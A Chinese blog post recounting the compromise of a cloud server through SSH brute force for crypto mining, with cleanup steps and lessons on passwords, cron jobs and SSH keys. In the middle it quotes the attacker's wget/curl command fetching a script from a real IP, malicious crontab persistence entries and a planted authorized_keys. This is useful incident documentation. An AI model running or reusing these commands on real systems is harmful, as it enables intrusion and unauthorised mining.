您现在的位置是:首页 > 文章详情

记录一次云主机被攻击挂恶意代码挖矿的事件

日期:2020-03-18点击:812

由于ECS使用了有规律的弱密码被SSH暴力破解(非22端口)

阿里云提示被入侵且执行了恶意代码,安全中心可处理。

相关资料: https://bbs.pediy.com/thread-251753.htm

https://zhuanlan.zhihu.com/p/111351235

但至第二天凌晨时,依旧报警。

父进程路径:/usr/bin/perl
父进程命令行:rsync
父进程id:12354
进程id:12355
用户名:root
URL链接:http://45.55.129.23/tddwrt7s.sh
进程路径:/usr/bin/bash
命令行参数:sh -c wget -q http://45.55.129.23/tddwrt7s.sh || curl -s -O -f http://45.55.129.23/tddwrt7s.sh 2>&1 3>&1
与该URL有关联的漏洞:None
事件说明:云盾检测到您的服务器正在尝试访问一个可疑恶意下载源,可能是黑客通过指令从远程服务器下载恶意文件,危害服务器安全。如果该指令不是您自己运行,请及时排查入侵原因,例如查看本机的计划任务、发起对外连接的父子进程。
解决方案:请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件,并及时清理已运行的恶意进程。如果该指令是您自己主动执行的,您可以在控制台点击标记为误报。
 
------------------------------------
后排查rsync进程目录下有可疑目录,进行了清除。
lrwxrwxrwx 1 root root 0 Mar 19 01:36 cwd -> /dev/shm/.tddddddddd
 
继续排查了定时计划
[root@izbp168lretu4toy79p12kz ~]# crontab -l
* */2 * * * /root/.bashtemprc/a/upd>/dev/null 2>&1
@reboot /root/.bashtemprc/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.bashtemprc/b/sync>/dev/null 2>&1
@reboot /root/.bashtemprc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X19-unix/.rsync/c/aptitude>/dev/null 2>&1
 
依旧存在可疑目录,删除
 
后续发现在/root/.ssh目录中中被植入了黑客的公钥文件authorized_keys, 可以被免密码登录SSH了。。。
--------------------
吸取些教训:
1.切不可用有规律的密码
2.定期检查系统定时任务是否有可疑的任务
3.定期检查/root/.ssh是否被替换了可疑的公钥
 
 
原文链接:https://my.oschina.net/u/1446823/blog/3197902
关注公众号

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。

持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。

文章评论

共有0条评论来说两句吧...

文章二维码

扫描即可查看该文章

点击排行

推荐阅读

最新文章